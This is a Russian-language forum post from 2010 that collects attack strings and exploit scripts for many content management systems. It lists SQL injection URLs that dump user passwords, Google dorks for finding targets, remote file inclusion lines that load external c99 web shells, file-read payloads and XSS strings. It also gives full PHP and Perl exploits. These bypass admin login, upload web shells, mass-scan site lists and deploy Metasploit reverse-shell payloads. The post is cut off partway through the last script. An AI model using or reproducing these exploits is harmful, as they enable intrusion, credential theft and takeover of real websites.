Старый 15.08.2010, 16:05   #1
Heartbreakers
Изгнан
 
Аватар для Heartbreakers
 
Регистрация: 24.07.2009
Сообщений: 1,408
Heartbreakers репутация неоспоримаHeartbreakers репутация неоспоримаHeartbreakers репутация неоспоримаHeartbreakers репутация неоспоримаHeartbreakers репутация неоспоримаHeartbreakers репутация неоспоримаHeartbreakers репутация неоспоримаHeartbreakers репутация неоспоримаHeartbreakers репутация неоспоримаHeartbreakers репутация неоспоримаHeartbreakers репутация неоспорима
Heartbreakers вне форума

По умолчанию Уязвимости различных CMS


toronja cms
toronja cms SQL Injection Vulnerability
Код:
[site]/index.php?plantilla=contenido_lista&ncategoria1=[SQL Injection]
[site]/interior.php?IDIOMA=SP&plantilla=contenido&ncategoria1=[SQL Injection]
Cosmos Solutions cms
Cosmos Solutions cms SQL Injection Vulnerability
Код:
Exploit : http://localhost/index.php?mid=[SQL Injection]
Dork : "Webdesign Cosmos Solutions"
Exploit : [site]/p_inf.php?page=[SQL Injection]
Exploit : [site]/index.php?id=[SQL Injection]
Speedy-Shop 2.0 CMS
Speedy-Shop 2.0 CMS Blind SQL Injection Vulnerability
Код:
http://[site]/dettagli.asp?sid=NULL&idp=1+[BSQLi]
Dutch stats cms
Dutch stats cms Remote file inclusion
Код:
stats/tools.php?included=[Http://shell.com/c99.txt]
CMScout
CMScout <= 1.23 (index.php) Remote SQL Injection Vulnerability
Код:
http://[ site ]/index.php?page=forums&f=1/**/union/**/all/**/select/**/0,uname,passwd,2,3,4,5,6,7,8/**/from/**/cms_authuser/*
CMScout 2.05 (common.php bit) Local File Inclusion Vulnerability
Код:
http://Example/common.php?bit=file.type%00
CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities
RFI:
Код:
http://[target]/[path]/index.php?page=mythings&cat=downloads&action=edit&id=null union all select 1,2,3,4,concat_ws(0x3a,uname,passwd),6,7,8,9,10,11 from cms_users--
http://[target]/[path]/admin.php?page=users&subpage=users_view&id=null union all select 1,2,concat_ws(0x3a,uname,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from cms_users--
LFI:
Код:
http://[target]/[path]/admin.php?bit=../../../../../boot.ini%00
http://[target]/[path]/index.php?bit=../../../../boot.ini%00
CMScout 2.08 SQL Injection Vulnerability
Код:
http://server/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users--http://[site]/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users--
CMScout (XSS/HTML Injection) Multiple Vulnerabilities
Код:
http://[site]/index.php?page=search&menuid=5
Symphony CMS
Symphony <= 1.7.01 (non-patched) Remote Code Execution Exploit
Код:
<?php
## Symphony <= 1.7.01 (non-patched) Remote Command Execution Exploit
## works regardless magic_quotes_gpc

echo "-----------------------------------------------------------------\n";
echo "Symphony <= 1.7.01 (non-patched) Remote Command Execution Exploit\n";
echo "(c)oded by Raz0r (http://Raz0r.name/)\n";
echo "-----------------------------------------------------------------\n";

if ($argc<3) {
echo "USAGE:\n";
echo "~~~~~~\n";
echo "php {$argv[0]} [url] [cmd]\n\n";
echo "[url] - target server where Symphony is installed\n";
echo "[cmd] - command to execute\n\n";
echo "e.g. php {$argv[0]} http://site.com/ \"ls -la\"\n";
die;
}

/*
i) admin authorization bypass
vulnerable code in symphony/lib/class.admin.php:
------------------[source code]----------------------
function login($username, $password, $already_md5=false, $update=true){
$sql  = "SELECT *\n";
$sql .= "FROM `tbl_authors`\n";
$sql .= "WHERE `username` = '".addslashes($username)."'\n";
$sql .= "AND `password` = '".(!$already_md5 ? md5($password) : $password)."'\n";
$row = $this->_db->fetchRow(0, $sql);
[...]
}
[...]
if(isset($_COOKIE[__SYM_COOKIE__])){
$args = unserialize($_COOKIE[__SYM_COOKIE__]);
$result = $this->login($args['username'], $args['password'], true, false);
}
------------------[/source code]---------------------
password value from cookie is not properly sanitized so the code above is vulnerable
to a SQL-injection which leads to admin authorization bypass.

ii) arbitrary file upload in admin panel
file manager in admin panel allows arbitrary file upload including php scripts. This vuln
is actual only for non-patched version, nevertheless the SQL-injection above works on
patched version too
*/

error_reporting(0);
set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);

$url = $argv[1];
$cmd = $argv[2];

$url_parts = parse_url($url);
$host = $url_parts['host'];
$path = $url_parts['path'];
if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80;

echo "[~] Uploading shell... ";
exploit($host,$path,$port) ? print("OK\n") : die("Failed\n");

echo "[~] Executing command... ";
$res = cmd($host,$path,$port,$cmd);
if ($res) {
   printf("OK\n%'-65s\n%s%'-65s\n",'',$res,'');
}else {
   die("Failed");
}

function exploit($host,$path,$port) {
   $ock = fsockopen(gethostbyname($host),$port);
   if (!$ock) return false;

   $data = "--------bndry31337\r\n";
   $data.= "Content-Disposition: form-data; ";
   $data.= "name=\"file\"; filename=\"s.php\"\r\n";
   $data.= "Content-Type: text/plain\r\n\r\n";
   $data.= "<?php echo @`{\$_POST['c']}`; ?>\r\n";
   $data.= "--------bndry31337\r\n";

   $data.= "--------bndry31337\r\n";
   $data.= "Content-Disposition: form-data; name=\"filter\"\r\n\r\n";
   $data.= "--------bndry31337\r\n";

   $data.= "--------bndry31337\r\n";
   $data.= "Content-Disposition: form-data; name=\"destination\"\r\n\r\n";
   $data.= "workspace/masters/\r\n";
   $data.= "--------bndry31337\r\n";

   $data.= "--------bndry31337\r\n";
   $data.= "Content-Disposition: form-data; name=\"action[upload]\"\r\n\r\n";
   $data.= "Upload\r\n";
   $data.= "--------bndry31337\r\n";

   $data.= "--------bndry31337\r\n";
   $data.= "Content-Disposition: form-data; name=\"with-selected\"\r\n\r\n";
   $data.= "With selected...\r\n";
   $data.= "--------bndry31337\r\n";

   $packet = "POST {$path}symphony/?page=/publish/filemanager/ HTTP/1.0\r\n";
   $packet.= "Host: {$host}\r\n";
   $packet.= "User-Agent: Opera/9.27 (Symphony fucker edition)\r\n";
   $packet.= "Cookie: sym_auth=a%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22";
   $packet.= "admin%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%2231337%27+OR+1%3D1+";
   $packet.= "+LIMIT+1%2F%2A%22%3Bs%3A2%3A%22id%22%3Bi%3A1%3B%7D\r\n";
   $packet.= "Content-Type: multipart/form-data; boundary=------bndry31337\r\n";
   $packet.= "Content-Length: ".strlen($data)."\r\n";
   $packet.= "Connection: close\r\n\r\n";

   $packet.= $data;

   fputs($ock, $packet);
   $html='';
   while (!feof($ock)) $html.=fgets($ock);

   return preg_match('@Location: .+?upload-success@',$html) ? true : false;
}

function cmd($host,$path,$port,$cmd) {
   $ock = fsockopen(gethostbyname($host),$port);
   if (!$ock) return false;
     $data   = "c=".urlencode($cmd);
     $packet = "POST {$path}workspace/masters/s.php HTTP/1.0\r\n";
   $packet.= "Host: {$host}\r\n";
   $packet.= "User-Agent: Opera/9.27 (Symphony fucker edition)\r\n";
   $packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
   $packet.= "Content-Length: ".strlen($data)."\r\n";
   $packet.= "Connection: close\r\n\r\n";
     $packet.= $data."\r\n";
     fputs($ock, $packet);
   $html='';
   while (!feof($ock)) $html.=fgets($ock);
     list($headers,$res)=explode("\r\n\r\n",$html);
   return strlen($res) ? $res : false;
}

?>
Symphony CMS Local File Inclusion Vulnerability
Код:
http://localhost/[path]/index.php?mode=[LFI]
http://localhost/index.php?mode=../../../../../../../../../../../../../../../etc/passwd%00
WsCMS
WsCMS XSS / SQL Injection Vulnerability
Код:
Exploit: [site]/news.php?id=[SQL Injection]
[site]/staff.php?id=[SQL Injection]  
[site]/products.php?cid=[SQL Injection]
[site]/our_work.php?id= [SQL Injection]

XSS/HTML Injection : [site]/news.php?id=<marquee><font color=red size=15>XSS</font></marquee>
Delivering Digital Media CMS
Delivering Digital Media CMS SQL Injection Vulnerability
Код:
http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat(user_id,0x3a,username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--
PHProjekt
PHProjekt <= 5.1 Multiple Remote File Include Vulnerabilities
Код:
http://www.site.com/[PHProjekt_path]/lib/dbman_filter.inc.php?lib_path=[evil_scripts]
http://www.site.com/[PHProjekt_path]/lib/specialdays.php?path_pre=[evil_scripts]
PHProjekt <= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities
Код:
http://[Target]/[Path]/cm_navigation-33.inc.php?path_pre=http://cmd.gif?
http://[Target]/[Path]/cm_navigation.inc.php?path_pre=http://cmd.gif?
http://[Target]/[Path]/cm_summary.inc.php?path_pre=http://cmd.gif?
Content Management System for Phprojekt 0.6.1 RFI Vulnerabiltiies
Код:
http://WwW.4RxH.CoM/cm/cm_navigation-33.inc.php?path_pre=http://rxh.freehostia.com/shells/c99in.txt?
http://WwW.4RxH.CoM/cm/cm_navigation.inc.php?path_pre=http://rxh.freehostia.com/shells/c99in.txt?
http://WwW.4RxH.CoM/cm/cm_summary.inc.php?path_pre=http://rxh.freehostia.com/shells/c99in.txt?
2CMS
2CMS SQL Injection Vulnerability
Код:
http://[site]/path/news_details.php?id=[sqli]
http://[site]/path/category.php?cid=[sqli]
WmsCMS
WmsCMS XSS / SQL Injection Vulnerability
Код:
SQLi & BSQLi
# http://[site]/default.asp (Parameter search)
# http://[site]/default.asp (Parameter sbr)
# http://[site]/default.asp (Parameter pid)
# http://[site]/default.asp (Parameter sbl)
# http://[site]/default.asp (Parameter FilePath)
# http://[site]/printpage.asp (Parameter sbr)
# http://[site]/printpage.asp (Parameter pr)
# http://[site]/printpage.asp (Parameter psPrice)
 
xss
# http://[site]/default.asp (Parameter = search)
# http://[site]/default.asp (Parameter = sbr)
# http://[site]/default.asp (Parameter = p)
# http://[site]/default.asp (Parameter = sbl)
AWCM CMS
AWCM CMS Local File Inclusion Vulnerability
Код:
<?php
 
print("
------------------------------------------------------------
| Awcm Cms Local File Inclusion Vulnerability
| By SwEET-DeViL
| x0.root(at)gmail.com
| example
|
| Exploit.php ".$argv[0]." example.com /path/ ../../../../../../../../etc/passwd
------------------------------------------------------------
");
$host =$argv[1];//;
$Path = "http://".$host.$argv[2];
       $CURL_in ="GET ".$Path."/notify.php?v=a HTTP/1.0\r\n";
       $CURL_in.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1)\r\n";
       $CURL_in.="Pragma: no-cache\r\n";
       $CURL_in.="Cookie: awcm_lang=".$argv[3]."".";\r\n";
       $CURL_in.="Connection: Close\r\n\r\n";
 
       if ( empty($argv[3]) ){
               echo "\n[-] Error : Exploit failed\n";
               die;
       }
 
       $FoN = @fsockopen($host, 80);
       if(!$FoN){
               echo "\n[-] Error : Can't connect to ".$host." !!\n";
               die;
       }
 
       fputs($FoN, $CURL_in);
       while (!feof($FoN)) $data .= fread($FoN, 1024);
       fclose($FoN);
 
       $error_1 = strstr( $data, "HTTP/1.1 404 Not Found" );
       if ( !empty($error_1) ){
               echo "\n[-] Error : 404 Not Found. \n";
               die;
       }
 
       $error_2 = strstr( $data, "HTTP/1.1 406 Not Acceptable" );
       if ( !empty($error_2) ){
               echo "\n[-] Error : 406 Not Acceptable. \n";
               die;
       }
 
 
 
$EXc = explode("</head>",$data);
$EXx = explode("<head>",$EXc[1]);
$CODE = strip_tags($EXx[0]);
$CODE2 = preg_replace("/\r|\t/",'',$CODE);
$CODE2 = trim($CODE2);
 
if (empty($CODE2)){
print ('
 
[-] Error : Sorry! File not Found
 
');
}else{
print ('
[+]
------------------------------------------------------------
').$CODE2;
 
 
 
print ('
 
------------------------------------------------------------
');
 
}
 
?>
Netvolution CMS
Netvolution CMS 1.0 (XSS/SQL) Multiple Remote Vulnerabilities
Код:
Version Finding:
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=100%20AND%20SUBSTRING(@@version,1,130)=5

Password Finding:
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20AND%20
(select%20(substring(userPassword,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608

Username Finding:
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20
AND%20(select%20(substring(userName,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608

Cross Site Scripting
Set the variable email to >"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>
Netvolution CMS <= 2.x SQL Injection Exploit Script
Код:
#!/usr/bin/perl

#########################################################################################
#											#
# Exploit Title: Netvolution exploit script for CMS Version >= 2.xx.xx.xx		#
# Date: 10/6/2010				  					#
# Sotware Link: www.netvolution.net										#
# Exploited by: krumel									# 
# Exploit Coded: mr.pr0n								#
#                                     							#
# Many thanks to icesurfer (author of SQLNINJA) and all p0wnbox members.		#
# I have contact www.atcom.gr no response yet, although it seems that they have patch   #
# partially the software.								#
#########################################################################################
#											#
# This program is free software; you can redistribute it and/or				#
# modify it under the terms of the GNU General Public License				#
# as published by the Free Software Foundation; either version 2			#
# of the License, or (at your option) any later version.				#
# 											#
# This program is distributed in the hope that it will be useful,			#
# but WITHOUT ANY WARRANTY; without even the implied warranty of			#
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the				#
# GNU General Public License for more details.						#
#											# 
# You should have received a copy of the GNU General Public License			#
# along with this program; if not, write to the Free Software				#
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.		#
#											#
#########################################################################################

#Using some modules!
use LWP::UserAgent;
use IO::Socket;
use IO::Handle;

print "\e[1;31m  _   _      _              _       _   _                                _       _ _ 			\e[0m\n";    
print "\e[1;31m | \\ | |    | |            | |     | | (_)                              | |     (_) | 			\e[0m\n";  
print "\e[1;31m |  \\| | ___| |___   _____ | |_   _| |_ _  ___  _ __      _____  ___ __ | | ___  _| |_ 		        \e[0m\n"; 
print "\e[1;31m | . ` |/ _ \\ __\\ \\ / / _ \\| | | | | __| |/ _ \\| '_ \\    / _ \\ \\/ / '_ \\| |/ _ \\| | __|	\e[0m\n";
print "\e[1;31m | |\\  |  __/ |_ \\ V / (_) | | |_| | |_| | (_) | | | |  |  __/>  <| |_) | | (_) | | |_  		\e[0m\n";
print "\e[1;31m |_| \\_|\\___|\\__| \\_/ \\___/|_|\\__,_|\\__|_|\\___/|_| |_|   \\___/_/\\_\\ .__/|_|\\___/|_|\\__|	\e[0m\n";
print "\e[1;31m                                                                  | |                  			\e[0m\n";               
print "\e[1;31m                                                                  |_|  ...for CMS Version >= 2.xx.xx.xx 	\e[0m\n";

# ************* #
# Target dork.   
# ************* #
print "\nGoogle Dork:";
print "\n\e[1;45mallinurl: 'default.asp?pid'\e[0m\n";

# ************ #
# Main Menu.
# ************ #
menu:;

print "\n[*] Main Menu:\n";
print "    1. Automated list site scan for injection.\n";
print "    2. Export all Infomation_Schema Tables and Columns.\n";
print "    3. Find all Databases.\n";
print "    4. Export all usernames and passwords of the 'cms_Users' table.\n";
print "    5. Manuall exploitation.\n";
print "    6. Compatibility with the Metasploit Framework.\n";
print "    7. Exit.\n";

print "> ";
$option=<STDIN>;
print "\n";
if ($option!=1 && $option!=2 && $option!=3 && $option!=4 && $option!=5 && $option!=6 && $option!=7) 
{
print "\e[1;31mWrong Option!!\e[0m\n";
goto menu;
}
# Select Option.
if ($option==1)
{&site_scan} # Automated list site scan for injection.
if ($option==2)
{&info_schema_tables_and_columns}# Export all Infomation_Schema Tables and Columns.
if ($option==3)
{&extract_db}# Find all Databases.
if ($option==4)
{&automated_exploitation}# Export all usernames and passwords of the 'cms_Users'table.
if ($option==5)
{&manually}# Manuall exploitation.
if ($option==6)
{&metasploit}# Compatibility with Metasploit Project (Under construction).
if ($option==7)
{&quit}# Quit it!

# ******************************************* #
# Automated list site scan for injection.
# ******************************************* #
sub site_scan
{
$sites= "/Users/pentest/Desktop/sites.txt"; ########  ***[E_D_I_T  H_E_R_E]***  ##############
$scan = "10+and+1=convert(int,db_name(1))";

# Counter
$i = 1;
print "[*]Opening site list... \n";
open (SITELIST, $sites);
print "[*]Sitelist opened successfully!\n";
print "[*]Scanning...\n";
@sitelist = <SITELIST>;
   print "[*]Results:\n";
   for ($i; $i <= @sitelist; $i++)
   {  
       $host = $sitelist[$i]; 
       chop ($host);  
       $int = LWP::UserAgent->new() or die;
       $check=$int->get($host.$scan);   
          if ($check->content =~ m/value '(.*)' to/g)
          {
	    print "\e[1;36m$host\e[0m\n";
          }
    }
goto menu;
}

# ********************************************************** #
# Exploiting *all* the Infomation_Schema Tables and Columns.  
# ********************************************************** #
sub info_schema_tables_and_columns
{
# ***************#
# Table Counter 
# ***************#
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
$atcom=<STDIN>;
print "Enter the range scanning of Tables (e.g.: 15): \n";
print "> ";
$endt =<STDIN>;

# Counter
$countt = 1;
print "\n[*] Exloiting Information_Schema Tables...\n";
    $infoschema_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables))";
    $int = LWP::UserAgent->new() or die;
    $check=$int->get($atcom.$infoschema_t);
    if ($check->content =~ m/value '(.*)' to/g)
    {
       ($first_t) = $1;
        print "\e[1;33m$first_t\e[0m\n";
           @chars_t = split(//, "$first_t");
           $got_t = join("%", @chars_t);
           $first_t = "%27$got_t%27";
           for ($countt; $countt <= $endt; $countt++) 
           {
           $fullsqli_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables%20where%20table_name%20not%20in($first_t)))";
       	   $int = LWP::UserAgent->new() or die;
           $check=$int->get($atcom.$fullsqli_t);
           if ($check->content =~ m/value '(.*)' to/g)
           {
             ($next_t) = $1;
             print "\e[1;33m$next_t\e[0m\n";
	     @chars_t = split(//, "$next_t");
             $got_t = join("%", @chars_t);
             $next_t = $got_t ;
             $first_t = $first_t.",%27".$next_t."%27";
           }
       }
     }
      else 
          {
	  print "\e[1;31mFAILED!\e[0m\n";
          }
# ***************#
# Column Counter 
# ***************#
print "Enter the range of scanning Columns (e.g.: 20)\n";
print "> ";
$endc =<STDIN>;

# Counter
$countc = 1;
print "[*] Exloiting Information_Schema Column...\n";
   $infoschema_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns))";    
   $int = LWP::UserAgent->new() or die;
   $check=$int->get($atcom.$infoschema_c);  
       if ($check->content =~ m/value '(.*)' to/g)
        {
          ($first_c) = $1;
          print "\e[1;33m$first_c\e[0m\n";
          @chars_c = split(//, "$first_c");
          $got_c = join("%", @chars_c);
          $first_c = "%27$got_c%27";
         for ($countc; $countc <= $endc; $countc++)
         {
           $fullsqli_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns%20where%20column_name%20not%20in($first_c)))";
           $int = LWP::UserAgent->new() or die;
           $check=$int->get($atcom.$fullsqli_c);
           if ($check->content =~ m/value '(.*)' to/g)
           {
            ($next_c) = $1;
            print "\e[1;33m$next_c\e[0m\n";
	    @chars_c = split(//, "$next_c");
            $got_c = join("%", @chars_c);
            $next_c = $got_c ;
            $first_c = $first_c.",%27".$next_c."%27";
          }
         }
       }
      else 
         {
         print "\e[1;31mFAILED!\e[0m";
         }
goto menu;
}

# *************************************** #
# Exploiting *all* the inside Databases. 
# *************************************** #
sub extract_db
{
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
$atcom=<STDIN>;
print "Enter the range of scanning Databases (e.g.: 30)\n";
print "> ";
$enddb =<STDIN>;
# Counter
$countdb = 1;
print "[*] Exloiting the inside Databases....\n";
for ($countdb; $countdb <= $enddb; $countdb++)
{ 
    $db = "10+and+1=convert(int,db_name($countdb))";
    $int = LWP::UserAgent->new() or die;
    $check=$int->get($atcom.$db);  
    if ($check->content =~ m/value '(.*)' to/g)
       {
        ($database) = $1;
         print "[ID:$countdb]","\e[1;35m$database\e[0m\n";
       }
       else 
          {
	   print "\e[1;31mFAILED!\e[0m\n";
          }
}
goto menu;
}

# ***************************************************************** #
# Exploiting *all* usernames and passwords of the table "cms_Users" 
# ***************************************************************** #
sub automated_exploitation
{
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
$atcom=<STDIN>;
print "Enter the range of scanning userID (e.g.: 20)\n";
print "> ";
$end =<STDIN>;
# Counter
$count = 1;
print "[*] Exloiting Usernames and Passwords...\n";
for ($count; $count <= $end; $count++)
{ 
$useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29";
$userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29";
    $int = LWP::UserAgent->new() or die;
    $check=$int->get($atcom.$useremail);   
    if ($check->content =~ m/value '(.*)' to/g)
    {
       ($email) = $1;
       print "[ID:$count]"," \e[1;32m$email\e[0m";
       $gotmail = $email; # Usage for the section of Metasploit Framework.
       $int = LWP::UserAgent->new() or die;
       $check=$int->get($atcom.$userpassword);
         if ($check->content =~ m/value '(.*)' to/g){
         ($pass) = $1;
         print " : \e[1;32m$pass\e[0m\n";
         $gotpass = $pass; # Usage for the section of Metasploit Framework.
         }
         else 
            {
            print " : \e[1;31m-\e[0m\n";
            }}
     else 
        {
        print "[ID:$count","] \e[1;31m-\e[0m : \e[1;31m-\e[0m\n";
        }
}
goto menu;
}

# **************************************** #
# Exploiting Columns and Tables manually.
# **************************************** #
sub manually
{
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
$atcom=<STDIN>;
print "Enter the name of your target's Table (e.g.: cms_Users)\n";
print "> ";
$table =<STDIN>;
print "Enter your the name of your target's Column (e.g.: userpassword)\n";
print "> ";
$column =<STDIN>;
print "Enter the range of scanning (e.g.: 10)\n";
print "> ";
$endm =<STDIN>;

$countm = 1;
print "[*] Manuall Exploitation...\n";
for ($countm; $countm <= $endm; $countm++)
{ 
$manually = "10+and+1=convert(int,(se%l%e%c%t(substring($column,1,1000))%20from%20$table%20where%20userID=$countm%29%29";
    $int = LWP::UserAgent->new() or die;
    $check=$int->get($atcom.$manually);   
    if ($check->content =~ m/value '(.*)' to/g){
       ($got) = $1;
       print "[ID:$countm]"," \e[1;32m$got\e[0m\n";
       }
       else 
          {
          print "[ID:$countm","] \e[1;31m-\e[0m : \e[1;31m-\e[0m\n";
          }
  }
goto menu;
}

# ***************************************************************** #
# Compatibility with the Metasploit Framework.
# ***************************************************************** #
sub metasploit
{
if (($gotmail eq "") or ($gotpass eq ""))
{
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
$atcom=<STDIN>;
$end = 10;
$count = 1;
for ($count; $count < $end; $count++)
{ 
$useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29";
$userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29";

    $int = LWP::UserAgent->new() or die;
    $check=$int->get($atcom.$useremail);   
    if ($check->content =~ m/value '(.*)' to/g)
    {
       ($email) = $1;
       $gotmail = $email;
       $int = LWP::UserAgent->new() or die;
       $check=$int->get($atcom.$userpassword);
         if ($check->content =~ m/value '(.*)' to/g){
         ($pass) = $1;
         $gotpass = $pass;
         $end = $count;
         }}
}
}
if ($atcom =~ m/www.(.*).gr/g){
($site) = $1;
}

# Checking if the Metasploit Framework is already installed.
print "[*] Looking for the Metasploit Framework... ";
$msfcli = "";
$msfpayload = "";
if ($msfpath eq "") {
	$path1 = $ENV{PATH};
	@path = split(/:/,$path1);
	foreach (@path) {
		if (-e $_."/msfcli") {
			$msfcli = $_."/msfcli";
		} elsif (-e $_."/msfcli3") {
			$msfcli = $_."/msfcli3";
		}
		if (-e $_."/msfpayload") {
			$msfpayload = $_."/msfpayload";
		} elsif (-e $_."/msfpayload3") {
			$msfpayload = $_."/msfpayload3";
		}
	}
} else {
	if (-e $msfpath."/msfcli") {
		$msfcli = $msfpath."msfcli";
	} elsif (-e $msfpath."/msfcli3") {
		$msfcli = $msfpath."msfcli3";
	}
	if (-e $msfpath."/msfpayload") {
		$msfpayload = $msfpath."msfpayload";
	} elsif (-e $msfpath."/msfpayload3") {
		$msfpayload = $msfpath."msfpayload3";
	}
		
	}

if ($msfcli eq ""){
        print "[\e[1;31m FAILED \e[0m]\n";
	print "[-] msfcli not found\n";
	exit(-1);
        }

if ($msfpayload eq "") {
        print "[\e[1;32m FAILED \e[0m]\n";
	print "[-] msfpayload not found\n";
	exit(-1);
        }
print "[\e[1;32m DONE \e[0m]\n";

#Retrieve Cookie
system('curl -k -L -b cookies.txt -c cookies.txt -o step-1.html http://www.'.$site.'.gr/');
system('curl -k -L -b cookies.txt -c cookies.txt  -d email='.$gotmail.' -d password='.$gotpass.' -o step-2.html http://www.'.$site.'.gr/admin/default.asp?ac=2');

#Upload Web-Backdoor
system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@cmdasp.aspx http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles');

# Choose your payload.
print "Which payload you want to use?\n";
print "    1. Meterpreter\n    2. VNC\n";

while (($payload ne 1) and ($payload ne 2)) {
	print "msf > ";
	$payload = <STDIN>;
	chomp($payload);
        }

if ($payload == 1) {
	$payload = "meterpreter";
        } else {
	$payload = "vncinject";
        }

# Choose your connection.
print "Which type of connection you want to use?\n";
print "    1. bind_tcp\n    2. reverse_tcp\n";
while (($conn ne "1") and ($conn ne "2")) {
	print "msf > ";
	$conn = <STDIN>;
	chomp($conn);
        }

if ($conn == 1) {
	$conn = "bind_tcp";
        } else {
	$conn = "reverse_tcp";
        }

if ($conn eq "bind_tcp"){
	print "Enter your Remote host\n";
	print "msf > ";
	$rhost = <STDIN>;
	chomp $rhost
        } else {
	print "Enter your Public IP\n";
	print "msf > ";
	$lhost = <STDIN>;
	chomp $lhost ;
        print "Enter your Local Host\n";
	print "msf > ";
	$lhost1 = <STDIN>;
	chomp $lhost1 ;
	}

if ($conn eq "bind_tcp"){
	print "Enter Remote port number\n";
	} else {
	print "Enter local port number\n";
	}

$port = 0;
while (($port < 1) or ($port > 65535)){
	print "msf > ";
	$port = <STDIN>;
	chomp($port);
        }

# Choose your Encryption.
$enc = -1;
print "[*] Choose a payload encoding method:\n".
      "    0.  None\n".
      "    1.  Alpha2 Alphanumeric Mixedcase\n".
      "    2.  Alpha2 Alphanumeric Uppercase\n".
      "    3.  Avoid UTF8/tolower\n".
      "    4.  Call+4 Dword XOR\n".
      "    5.  Single-byte XOR Countdown\n".
      "    6.  Variable-length Fnstenv/mov Dword XOR\n".
      "    7.  Polymorphic Jump/Call XOR Additive Feedback\n".
      "    8.  Non-Alpha\n".
      "    9.  Non-Upper\n".
      "   10.  Polymorphic XOR Additive Feedback\n".
      "   11.  Alpha2 Alphanumeric Unicode Mixedcase\n".
      "   12.  Alpha2 Alphanumeric Unicode Uppercase\n";
while (($enc < 0) or ($enc > 12)) 
{
	print "msf > ";
	$enc = <STDIN>;
	chomp($enc);
}
$encoder = " encoder=";
for ($enc) 
{
	/^0$/ && do {$encoder = ""};
	/^1$/ && do {$encoder .= "x86/alpha_mixed "};
	/^2$/ && do {$encoder .= "x86/alpha_upper "};
	/^3$/ && do {$encoder .= "x86/avoid_utf8_tolower "};
	/^4$/ && do {$encoder .= "x86/call4_dword_xor "};
	/^5$/ && do {$encoder .= "x86/countdown "};
	/^6$/ && do {$encoder .= "x86/fnstenv_mov "};
	/^7$/ && do {$encoder .= "x86/jmp_call_additive "};
	/^8$/ && do {$encoder .= "x86/nonalpha "};
	/^9$/ && do {$encoder .= "x86/nonupper "};
	/^10$/ && do {$encoder .= "x86/shikata_ga_nai "};
	/^11$/ && do {$encoder .= "x86/unicode_mixed "};
	/^12$/ && do {$encoder .= "x86/unicode_upper "};
}

# Creation of the executable payload.
$exe = "backup".int(rand()*010101);
$command = $msfpayload." windows/".$payload."/".$conn.$encoder." exitfunc=process";

if ($conn eq "bind_tcp") 
{
	$command .= " lport=".$port." X > /tmp/".$exe.".exe";
	} else {
		$command .= " lport=".$port." lhost=".$lhost." X "."> /tmp/".$exe.".exe";
		}
		if ($verbose == 1) 
		{
		print "[v] Command: ".$command."\n";
		}
		system ($command);
		unless (-e "/tmp/".$exe.".exe") {
		print "[-] Payload creation... [\e[1;31m FAILED \e[0m]\n";
		exit(-1);
}

print "[*] Payload creation... [\e[1;32m DONE \e[0m]\n";
print "[*] Payload (".$exe.".exe) created.\n";

$xpl = '/tmp/'.$exe.'.exe';

#Upload the executable file to the remote Webserver.
system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@'.$xpl.' http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles');

$parameter = $exe.".exe";

# The child handles the request to the target, the parent calls Metasploit Framework!
$pid = fork();
if ($pid eq 0) {
sleep(1);
exit(0);
}

# This is the parent.
$syscommand = $msfcli." exploit/multi/handler "."PAYLOAD=windows/".$payload."/".$conn." ";
if ($conn eq "bind_tcp")
	{
	$syscommand .= "LPORT=".$port." RHOST=".$rhost." E";
	print "\e[1;34m$syscommand\e[0m\n";
	} else {

		$syscommand .= "LPORT=".$port." LHOST=".$lhost1." E";
